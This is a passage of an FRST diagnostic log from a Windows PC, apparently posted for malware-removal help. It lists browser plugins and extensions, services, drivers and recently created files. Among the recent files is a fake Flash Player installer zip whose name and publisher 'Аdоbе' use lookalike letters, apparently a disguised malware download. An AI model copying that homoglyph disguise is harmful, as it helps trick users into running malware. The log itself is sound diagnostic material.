FF Plugin-x32: @java.com/DTPlugin,version=10.65.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll [2014-07-11] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.65.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll [2014-07-11] (Oracle Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.50901.0\npctrl.dll [2016-08-31] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3528.0331 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2014-03-31] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-07-28] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-07-28] (Google Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2014-09-12] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-1771700083-1338792134-2885675772-1001: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\King\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [2016-05-08] (Unity Technologies ApS)
FF Plugin ProgramFiles/Appdata: C:\Users\King\AppData\Roaming\mozilla\plugins\npgoogletalk.dll [2013-09-20] (Google)
FF Plugin ProgramFiles/Appdata: C:\Users\King\AppData\Roaming\mozilla\plugins\npgtpo3dautoplugin.dll [2013-09-20] ()
FF Plugin ProgramFiles/Appdata: C:\Users\King\AppData\Roaming\mozilla\plugins\npo1d.dll [2013-09-20] (Google)

Chrome: 
=======
CHR DefaultProfile: Default
CHR Profile: C:\Users\King\AppData\Local\Google\Chrome\User Data\Default [2016-10-19]
CHR Extension: (BetterTTV) - C:\Users\King\AppData\Local\Google\Chrome\User Data\Default\Extensions\ajopnjidmegmdimjlfnijceegpefgped [2016-10-10]
CHR Extension: (Google Docs) - C:\Users\King\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-02-27]
CHR Extension: (Google Drive) - C:\Users\King\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-10-22]
CHR Extension: (Session Manager) - C:\Users\King\AppData\Local\Google\Chrome\User Data\Default\Extensions\bbcnbpafconjjigibnhbfmmgdbbkcjfi [2016-04-29]
CHR Extension: (YouTube) - C:\Users\King\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-09-26]
CHR Extension: (Google Search) - C:\Users\King\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-10-29]
CHR Extension: (FrankerFaceZ) - C:\Users\King\AppData\Local\Google\Chrome\User Data\Default\Extensions\fadndhdgpmmaapbmfcknlfgcflmmmieb [2015-10-31]
CHR Extension: (Stylish) - C:\Users\King\AppData\Local\Google\Chrome\User Data\Default\Extensions\fjnbnpbmkenffdnngjfgmeleoegfcffe [2016-04-05]
CHR Extension: (Google Docs Offline) - C:\Users\King\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-03-15]
CHR Extension: (AdBlock) - C:\Users\King\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2016-10-09]
CHR Extension: (BetterDiscord) - C:\Users\King\AppData\Local\Google\Chrome\User Data\Default\Extensions\ldbnkkfciifmjgnpfkobkmkhllmkghna [2016-01-02]
CHR Extension: (SmoothScroll) - C:\Users\King\AppData\Local\Google\Chrome\User Data\Default\Extensions\nbokbjkabcmbfdlbddjidfmibcpneigj [2016-10-19]
CHR Extension: (Chrome Web Store Payments) - C:\Users\King\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-04-02]
CHR Extension: (Gmail) - C:\Users\King\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-04-11]
CHR Extension: (Chrome Media Router) - C:\Users\King\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2016-09-21]
CHR Extension: (RSS Feed Reader) - C:\Users\King\AppData\Local\Google\Chrome\User Data\Default\Extensions\pnjaodmkngahhkoihejjehlcdlnohgmp [2016-10-02]

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S3 BEService; C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [1392648 2016-07-12] ()
S3 celavimushost; R:\Program Files (x86)\CEVO\CSGO Client Beta\CelavimusClientHelper.exe [124120 2015-09-13] (altPUG LLC)
S3 Creative ALchemy AL6 Licensing Service; C:\Program Files (x86)\Common Files\Creative Labs Shared\Service\AL6Licensing.exe [79360 2014-05-09] (Creative Labs) [File not signed]
S3 Creative Audio Engine Licensing Service; C:\Program Files (x86)\Common Files\Creative Labs Shared\Service\CTAELicensing.exe [79360 2016-04-09] (Creative Labs) [File not signed]
R2 CTAudSvcService; C:\Program Files (x86)\Creative\Shared Files\CTAudSvc.exe [286720 2010-02-12] (Creative Technology Ltd) [File not signed]
S2 dbupdate; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2016-04-07] (Dropbox, Inc.)
S3 dbupdatem; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2016-04-07] (Dropbox, Inc.)
R2 DbxSvc; C:\Windows\system32\DbxSvc.exe [38000 2016-10-10] (Dropbox, Inc.)
R2 DTSAudioService; C:\Program Files\Realtek\Audio\HDA\DTSAudioService64.exe [210024 2011-05-31] (DTS)
R2 LogiRegistryService; C:\Program Files\Logitech Gaming Software\Drivers\APOService\LogiRegistryService.exe [192120 2015-09-19] (Logitech Inc.)
R2 MsMpSvc; C:\Program Files\Microsoft Security Client\MsMpEng.exe [120888 2016-08-30] (Microsoft Corporation)
R2 MSSQL$SQLEXPRESS; C:\Program Files\Microsoft SQL Server\MSSQL10.SQLEXPRESS\MSSQL\Binn\sqlservr.exe [57617752 2009-03-30] (Microsoft Corporation)
R3 NisSrv; C:\Program Files\Microsoft Security Client\NisSrv.exe [361816 2016-08-30] (Microsoft Corporation)
S4 nlsvc; C:\Program Files\Locktime Software\NetLimiter 4\NLSvc.exe [329344 2015-03-04] (Locktime Software)
S4 Origin Client Service; D:\Program Files (x86)\Origin\OriginClientService.exe [2104840 2016-03-03] (Electronic Arts)
R2 OVRService; C:\Program Files (x86)\Oculus\Service\OVRServiceLauncher.exe [231952 2014-12-03] () [File not signed]
R2 PnkBstrA; C:\Windows\system32\PnkBstrA.exe [76152 2015-12-10] ()
R2 PnkBstrA; C:\Windows\SysWOW64\PnkBstrA.exe [76888 2015-12-09] ()
S4 RemoteMouseService; C:\Program Files (x86)\Remote Mouse\RemoteMouseService.exe [18432 2016-05-17] () [File not signed]
R2 S3DSvc32; C:\Program Files (x86)\iZ3D Driver\Win32\S3DCService.exe [357888 2011-06-16] (iZ3D Inc.) [File not signed]
R2 S3DSvc64; C:\Program Files (x86)\iZ3D Driver\Win64\S3DCService.exe [477696 2011-06-16] (iZ3D Inc.) [File not signed]
S4 SBSDWSCService; D:\Program Files (x86)\Spybot - Search & Destroy\SDWinSec.exe [1153368 2009-01-26] (Safer Networking Ltd.)
S4 SQLAgent$SQLEXPRESS; C:\Program Files\Microsoft SQL Server\MSSQL10.SQLEXPRESS\MSSQL\Binn\SQLAGENT.EXE [427880 2009-03-30] (Microsoft Corporation)
S3 VSStandardCollectorService140; C:\Program Files (x86)\Microsoft Visual Studio 14.0\Team Tools\DiagnosticsHub\Collector\StandardCollector.Service.exe [52968 2015-07-07] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-26] (Microsoft Corporation)
S2 ZAPrivacyService; "C:\Program Files (x86)\CheckPoint\ZoneAlarm\ZAPrivacyService.exe" [X]

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S3 COMMONFX.DLL; C:\Windows\System32\COMMONFX.DLL [157496 2007-03-05] (Creative Technology Ltd)
S3 CTAUDFX.DLL; C:\Windows\System32\CTAUDFX.DLL [700216 2007-03-05] (Creative Technology Ltd)
S3 CTEAPSFX.DLL; C:\Windows\System32\CTEAPSFX.DLL [219448 2007-03-05] (Creative Technology Ltd)
S3 CTEDSPFX.DLL; C:\Windows\System32\CTEDSPFX.DLL [321848 2007-03-05] (Creative Technology Ltd)
S3 CTEDSPIO.DLL; C:\Windows\System32\CTEDSPIO.DLL [190264 2007-03-05] (Creative Technology Ltd)
S3 CTEDSPSY.DLL; C:\Windows\System32\CTEDSPSY.DLL [363320 2007-03-05] (Creative Technology Ltd)
S3 CTERFXFX.DLL; C:\Windows\System32\CTERFXFX.DLL [142136 2007-03-05] (Creative Technology Ltd)
S3 CTSBLFX.DLL; C:\Windows\System32\CTSBLFX.DLL [681272 2007-03-05] (Creative Technology Ltd)
S3 danewFltr; C:\Windows\System32\drivers\danew.sys [12032 2010-03-23] (Razer (Asia-Pacific) Pte Ltd) [File not signed]
R1 dtsoftbus01; C:\Windows\System32\DRIVERS\dtsoftbus01.sys [283064 2014-05-18] (Disc Soft Ltd)
S3 ebdrv; C:\Windows\system32\DRIVERS\evbda.sys [3286016 2009-06-10] (Broadcom Corporation)
R1 ESEADriver2; C:\Users\King\AppData\Local\Temp\ESEADriver2.sys [314720 2016-07-09] ()
S3 IOMap; C:\Windows\system32\drivers\IOMap64.sys [24824 2014-10-22] (ASUSTeK Computer Inc.)
R1 iZ3DInjectionDriver; C:\Program Files (x86)\iZ3D Driver\Win64\S3DInjectionDriver.sys [43704 2011-06-16] ()
R0 iZ3DShutterService; C:\Windows\System32\Drivers\iZ3DShutterService.sys [17464 2011-06-16] (iZ3D Inc.)
R0 KL1; C:\Windows\System32\DRIVERS\kl1.sys [458584 2012-11-15] (Kaspersky Lab ZAO)
U5 klflt; C:\Windows\System32\Drivers\klflt.sys [89944 2013-02-21] (Kaspersky Lab)
R1 KLIF; C:\Windows\System32\DRIVERS\klif.sys [613720 2013-02-21] (Kaspersky Lab)
R2 LGCoreTemp; C:\Program Files\Logitech Gaming Software\Drivers\LgCoreTemp\lgcoretemp.sys [14184 2015-06-21] (Logitech)
R3 LGJoyXlCore; C:\Windows\System32\drivers\LGJoyXlCore.sys [68384 2015-06-10] (Logitech Inc.)
S3 LGSHidFilt; C:\Windows\System32\DRIVERS\LGSHidFilt.Sys [64280 2013-05-30] (Logitech Inc.)
R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [295000 2016-08-25] (Microsoft Corporation)
R1 nbdrv; C:\Windows\System32\DRIVERS\nbdrv.sys [41392 2013-11-25] (SeriousBit)
R3 NisDrv; C:\Windows\System32\DRIVERS\NisDrvWFP.sys [135928 2016-08-25] (Microsoft Corporation)
R2 nldrv; C:\Program Files\Locktime Software\NetLimiter 4\nldrv.sys [125360 2015-03-04] (Locktime Software)
R3 nvlddmkm; C:\Windows\System32\DRIVERS\nvlddmkm.sys [11127392 2012-06-26] (NVIDIA Corporation) [File not signed]
S3 OCUSBVID; C:\Windows\System32\DRIVERS\OCUSBVID.sys [47560 2014-12-03] (Oculus VR, LLC)
R3 Phosgene; C:\Windows\System32\DRIVERS\Phosgene.sys [33672 2015-09-02] (Adoriasoft LLC)
R0 pwdrvio; C:\Windows\System32\pwdrvio.sys [19152 2013-09-30] ()
S3 pwdspio; C:\Windows\system32\pwdspio.sys [12504 2013-09-30] ()
R1 RiftEnabler; C:\Windows\System32\DRIVERS\RiftEnabler.sys [53704 2014-12-03] (Oculus VR, LLC)
S3 rt61x64; C:\Windows\System32\DRIVERS\WMP54Gv41x64.sys [446304 2010-04-07] (Ralink Technology, Corp.)
S3 rzdaendpt; C:\Windows\System32\DRIVERS\rzdaendpt.sys [43720 2015-08-13] (Razer Inc)
S3 rzvkeyboard; C:\Windows\System32\DRIVERS\rzvkeyboard.sys [44232 2015-08-13] (Razer Inc)
S3 Spyder2; C:\Windows\System32\DRIVERS\Spyder2.sys [15360 2007-01-17] ()
S3 usbcamcl; C:\Windows\System32\DRIVERS\usbcamcl.sys [62184 2011-12-08] (usb camera)
S3 VMUVC; C:\Windows\System32\Drivers\VMUVC.sys [198784 2009-05-25] (Vimicro Corporation)
S3 vvftUVC; C:\Windows\System32\drivers\vvftUVC.sys [303616 2008-07-01] (Vimicro Corporation)
U5 VWiFiFlt; C:\Windows\System32\Drivers\VWiFiFlt.sys [59904 2009-07-13] (Microsoft Corporation)
S3 WinRing0_1_2_0; D:\Program Files (x86)\EVGA\PrecisionX 16\WinRing0\WinRing0x64.sys [14536 2015-10-20] (OpenLibSys.org)
S3 x323e501; C:\Windows\SysWOW64\drivers\x323e501.sys [44896 2014-06-12] (Your Corporation) [File not signed]
S3 x643e501; C:\Windows\System32\drivers\x643e501.sys [68832 2014-06-12] (Your Corporation) [File not signed]
S3 catchme; \??\C:\ComboFix\catchme.sys [X]
S3 CT20XUT.DLL; system32\CT20XUT.DLL [X]
S3 CTEXFIFX.DLL; system32\CTEXFIFX.DLL [X]
S3 CTHWIUT.DLL; system32\CTHWIUT.DLL [X]
S3 dbx; system32\DRIVERS\dbx.sys [X]
S0 iaStor; system32\DRIVERS\iaStor.sys [X]
S3 Synth3dVsc; System32\drivers\synth3dvsc.sys [X]
S3 tsusbhub; system32\drivers\tsusbhub.sys [X]
S3 VGPU; System32\drivers\rdvgkmd.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-10-19 19:20 - 2016-10-19 19:20 - 00033540 _____ C:\Users\King\Desktop\FRST.txt
2016-10-19 19:19 - 2016-10-19 19:20 - 00000000 ____D C:\FRST
2016-10-19 19:19 - 2016-10-19 19:19 - 02407424 _____ (Farbar) C:\Users\King\Desktop\FRST64.exe
2016-10-19 16:52 - 2016-08-01 17:09 - 00452266 _____ C:\Windows\system32\Drivers\etc\hosts.20161019-165239.backup
2016-10-19 16:21 - 2016-10-19 16:21 - 00000000 ____D C:\Users\King\Desktop\install_flаsh_plаyer_for_windows_4_1_9_0172
2016-10-19 16:19 - 2016-10-19 16:19 - 00117955 _____ (Аdоbе) C:\Users\King\Desktop\install_flаsh_plаyer_for_windows_4_1_9_0172.zip
2016-10-14 20:24 - 2016-10-14 20:24 - 00000000 _____ C:\Windows\cd_127
2016-10-13 14:55 - 2016-10-13 14:55 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dropbox
2016-10-11 23:30 - 2016-09-30 08:37 - 05548264 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2016-10-11 23:30 - 2016-09-30 08:20 - 04000488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntkrnlpa.exe
2016-10-11 23:30 - 2016-09-30 08:20 - 03944680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntoskrnl.exe
2016-10-11 23:30 - 2016-09-15 08:30 - 00976896 _____ (Microsoft Corporation) C:\Windows\system32\inetcomm.dll
2016-10-11 23:30 - 2016-09-15 08:30 - 00084480 _____ (Microsoft Corporation) C:\Windows\system32\INETRES.dll
2016-10-11 23:30 - 2016-09-15 08:15 - 00741888 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcomm.dll
2016-10-11 23:30 - 2016-09-15 08:15 - 00084480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\INETRES.dll
2016-10-11 23:30 - 2016-09-12 14:13 - 00154856 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys
2016-10-11 23:30 - 2016-09-12 14:13 - 00095464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecdd.sys
2016-10-11 23:30 - 2016-09-12 14:08 - 01465344 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2016-10-11 23:30 - 2016-09-12 14:08 - 01212928 _____ (Microsoft Corporation) C:\Windows\system32\rpcrt4.dll
2016-10-11 23:30 - 2016-09-12 14:08 - 00730624 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2016-10-11 23:30 - 2016-09-12 14:08 - 00690688 _____ (Microsoft Corporation) C:\Windows\system32\adtschema.dll
2016-10-11 23:30 - 2016-09-12 14:08 - 00463872 _____ (Microsoft Corporation) C:\Windows\system32\certcli.dll
2016-10-11 23:30 - 2016-09-12 14:08 - 00345600 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll
2016-10-11 23:30 - 2016-09-12 14:08 - 00316416 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll
2016-10-11 23:30 - 2016-09-12 14:08 - 00312320 _____ (Microsoft Corporation) C:\Windows\system32\ncrypt.dll
2016-10-11 23:30 - 2016-09-12 14:08 - 00210432 _____ (Microsoft Corporation) C:\Windows\system32\wdigest.dll
2016-10-11 23:30 - 2016-09-12 14:08 - 00190464 _____ (Microsoft Corporation) C:\Windows\system32\rpchttp.dll
2016-10-11 23:30 - 2016-09-12 14:08 - 00146432 _____ (Microsoft Corporation) C:\Windows\system32\msaudite.dll
2016-10-11 23:30 - 2016-09-12 14:08 - 00135680 _____ (Microsoft Corporation) C:\Windows\system32\sspicli.dll
2016-10-11 23:30 - 2016-09-12 14:08 - 00107520 _____ (Microsoft Corporation) C:\Windows\system32\adsmsext.dll
2016-10-11 23:30 - 2016-09-12 14:08 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2016-10-11 23:30 - 2016-09-12 14:08 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\msobjs.dll
2016-10-11 23:30 - 2016-09-12 14:08 - 00043520 _____ (Microsoft Corporation) C:\Windows\system32\cryptbase.dll
2016-10-11 23:30 - 2016-09-12 14:08 - 00028672 _____ (Microsoft Corporation) C:\Windows\system32\sspisrv.dll
2016-10-11 23:30 - 2016-09-12 14:08 - 00028160 _____ (Microsoft Corporation) C:\Windows\system32\secur32.dll
2016-10-11 23:30 - 2016-09-12 14:08 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2016-10-11 23:30 - 2016-09-12 13:49 - 00690688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\adtschema.dll
2016-10-11 23:30 - 2016-09-12 13:49 - 00666112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpcrt4.dll
2016-10-11 23:30 - 2016-09-12 13:49 - 00553472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll
2016-10-11 23:30 - 2016-09-12 13:49 - 00342528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\certcli.dll
2016-10-11 23:30 - 2016-09-12 13:49 - 00260608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msv1_0.dll
2016-10-11 23:30 - 2016-09-12 13:49 - 00254464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schannel.dll
2016-10-11 23:30 - 2016-09-12 13:49 - 00223232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ncrypt.dll
2016-10-11 23:30 - 2016-09-12 13:49 - 00172032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wdigest.dll
2016-10-11 23:30 - 2016-09-12 13:49 - 00146432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msaudite.dll
2016-10-11 23:30 - 2016-09-12 13:49 - 00141312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpchttp.dll
2016-10-11 23:30 - 2016-09-12 13:49 - 00096768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sspicli.dll
2016-10-11 23:30 - 2016-09-12 13:49 - 00076800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\adsmsext.dll
2016-10-11 23:30 - 2016-09-12 13:49 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll
2016-10-11 23:30 - 2016-09-12 13:49 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msobjs.dll
2016-10-11 23:30 - 2016-09-12 13:49 - 00022016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\secur32.dll
2016-10-11 23:30 - 2016-09-12 13:49 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll
2016-10-11 23:30 - 2016-09-12 13:39 - 00064000 _____ (Microsoft Corporation) C:\Windows\system32\auditpol.exe
2016-10-11 23:30 - 2016-09-12 13:37 - 03218944 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2016-10-11 23:30 - 2016-09-12 13:32 - 00291328 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb10.sys
2016-10-11 23:30 - 2016-09-12 13:32 - 00159744 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb.sys
2016-10-11 23:30 - 2016-09-12 13:32 - 00129536 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb20.sys
2016-10-11 23:30 - 2016-09-12 13:31 - 00030720 _____ (Microsoft Corporation) C:\Windows\system32\lsass.exe
2016-10-11 23:30 - 2016-09-12 13:29 - 00050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\auditpol.exe
2016-10-11 23:30 - 2016-09-12 13:25 - 00036352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptbase.dll
2016-10-11 23:30 - 2016-09-12 12:08 - 01251328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DWrite.dll
2016-10-11 23:30 - 2016-09-12 11:43 - 01648128 _____ (Microsoft Corporation) C:\Windows\system32\DWrite.dll
2016-10-11 23:30 - 2016-09-12 11:43 - 01180160 _____ (Microsoft Corporation) C:\Windows\system32\FntCache.dll
2016-10-11 23:30 - 2016-09-10 09:19 - 03649536 _____ (Microsoft Corporation) C:\Windows\system32\MSVidCtl.dll
2016-10-11 23:30 - 2016-09-10 08:53 - 02291712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MSVidCtl.dll
2016-10-11 23:30 - 2016-09-09 11:29 - 00631176 _____ (Microsoft Corporation) C:\Windows\system32\winresume.efi
2016-10-11 23:30 - 2016-09-09 11:26 - 00706280 _____ (Microsoft Corporation) C:\Windows\system32\winload.efi
2016-10-11 23:30 - 2016-09-09 11:23 - 01732864 _____ (Microsoft Corporation) C:\Windows\system32\ntdll.dll
2016-10-11 23:30 - 2016-09-09 11:20 - 01163264 _____ (Microsoft Corporation) C:\Windows\system32\kernel32.dll
2016-10-11 23:30 - 2016-09-09 11:20 - 00880640 _____ (Microsoft Corporation) C:\Windows\system32\advapi32.dll
2016-10-11 23:30 - 2016-09-09 11:20 - 00503808 _____ (Microsoft Corporation) C:\Windows\system32\srcore.dll
2016-10-11 23:30 - 2016-09-09 11:20 - 00419840 _____ (Microsoft Corporation) C:\Windows\system32\KernelBase.dll
2016-10-11 23:30 - 2016-09-09 11:20 - 00362496 _____ (Microsoft Corporation) C:\Windows\system32\wow64win.dll
2016-10-11 23:30 - 2016-09-09 11:20 - 00243712 _____ (Microsoft Corporation) C:\Windows\system32\wow64.dll
2016-10-11 23:30 - 2016-09-09 11:20 - 00215552 _____ (Microsoft Corporation) C:\Windows\system32\winsrv.dll
2016-10-11 23:30 - 2016-09-09 11:20 - 00063488 _____ (Microsoft Corporation) C:\Windows\system32\setbcdlocale.dll
2016-10-11 23:30 - 2016-09-09 11:20 - 00059904 _____ (Microsoft Corporation) C:\Windows\system32\appidapi.dll
2016-10-11 23:30 - 2016-09-09 11:20 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\srclient.dll
2016-10-11 23:30 - 2016-09-09 11:20 - 00044032 _____ (Microsoft Corporation) C:\Windows\system32\csrsrv.dll
2016-10-11 23:30 - 2016-09-09 11:20 - 00034816 _____ (Microsoft Corporation) C:\Windows\system32\appidsvc.dll
2016-10-11 23:30 - 2016-09-09 11:20 - 00016384 _____ (Microsoft Corporation) C:\Windows\system32\ntvdm64.dll
2016-10-11 23:30 - 2016-09-09 11:20 - 00013312 _____ (Microsoft Corporation) C:\Windows\system32\wow64cpu.dll
2016-10-11 23:30 - 2016-09-09 11:20 - 00006656 _____ (Microsoft Corporation) C:\Windows\system32\apisetschema.dll
2016-10-11 23:30 - 2016-09-09 11:20 - 00006144 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-security-base-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 11:20 - 00005120 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-file-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 11:20 - 00004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-threadpool-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 11:20 - 00004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processthreads-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 11:20 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-sysinfo-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 11:20 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-synch-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 11:20 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localregistry-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 11:20 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localization-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 11:20 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-rtlsupport-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 11:20 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processenvironment-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 11:20 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-namedpipe-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 11:20 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-misc-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 11:20 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-memory-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 11:20 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-libraryloader-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 11:20 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-heap-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 11:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-xstate-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 11:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-util-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 11:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-string-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 11:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-profile-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 11:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-io-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 11:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-interlocked-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 11:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-handle-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 11:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-fibers-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 11:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-errorhandling-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 11:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-delayload-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 11:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-debug-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 11:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-datetime-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 11:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-console-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 11:01 - 01314112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntdll.dll
2016-10-11 23:30 - 2016-09-09 11:00 - 01114112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kernel32.dll
2016-10-11 23:30 - 2016-09-09 11:00 - 00275456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KernelBase.dll
2016-10-11 23:30 - 2016-09-09 11:00 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\srclient.dll
2016-10-11 23:30 - 2016-09-09 11:00 - 00005120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wow32.dll
2016-10-11 23:30 - 2016-09-09 10:59 - 00644096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\advapi32.dll
